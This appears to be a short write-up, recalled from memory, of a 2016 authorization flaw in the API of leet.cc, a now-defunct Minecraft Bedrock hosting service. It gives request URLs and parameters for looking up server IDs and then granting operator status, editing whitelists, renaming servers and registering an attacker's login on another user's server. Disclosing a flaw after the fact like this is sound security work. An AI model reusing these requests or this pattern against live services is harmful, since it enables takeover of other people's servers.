The domain name
leet.cc was an Minecraft bedrock server hosting provider. (Service seems to no longer exist)
The following bug allowed getting OP just by knowing someone’s server domain.
This bug is from 2016 the same time they had their database breached https://news.softpedia.com/news/data-for-6-million-minecraft-gamers-stolen-from-leet-cc-servers-507445.shtml where someone uploaded a PHP shell to their website… This is from memory I may get stuff wrong.
I would hope it’s fixed now 🙂 but then this is leet.cc
Reverse engineer the Android app using online apk decompilers and look at the network traffic using https://www.telerik.com/fiddler to see if the API did authentication correctly.
Credit: https://www.youtube.com/watch?v=LbZqaLKS7V4
Server IDs (Incremental number) are used to identify what server to act on for the API.
This could be gotten easily by using https://leet.cc/verifyServerDomain.php?domain=<domain>
The user ID which used to be optional was the user’s email address or their device ID.
In order to exploit this one would make a request to:
https://mainapi.leet.cc/actionNew.php?cmd=<command>&userID=<userID>¶ms[]=<serverID>¶ms[]=<commandParameter>&versionCode=176&password=something_secret&client=google-free&k=<Base 64 encoded MD5 Hash of part of the URL>&sys=<Base 64 encoded MD5 Hash of part of the URL>
No one knows why k and sys were there.
And now the how to exploit FAQ 🙂
<command> is changeOP<commandParameter> is your in-game name<command> is changeWhitelistPlayers<commandParameter> is your in-game name<command> is changeServerName<commandParameter> is 🦆/login <password> is too annoying.setUserRegistration to off!Okay send a request to https://mainapi.leet.cc/serverLogin.php?serverEmail=<attacker email>&serverPassword=<attacker password>®isterServerID=<serverId>®isterUserID=<userId>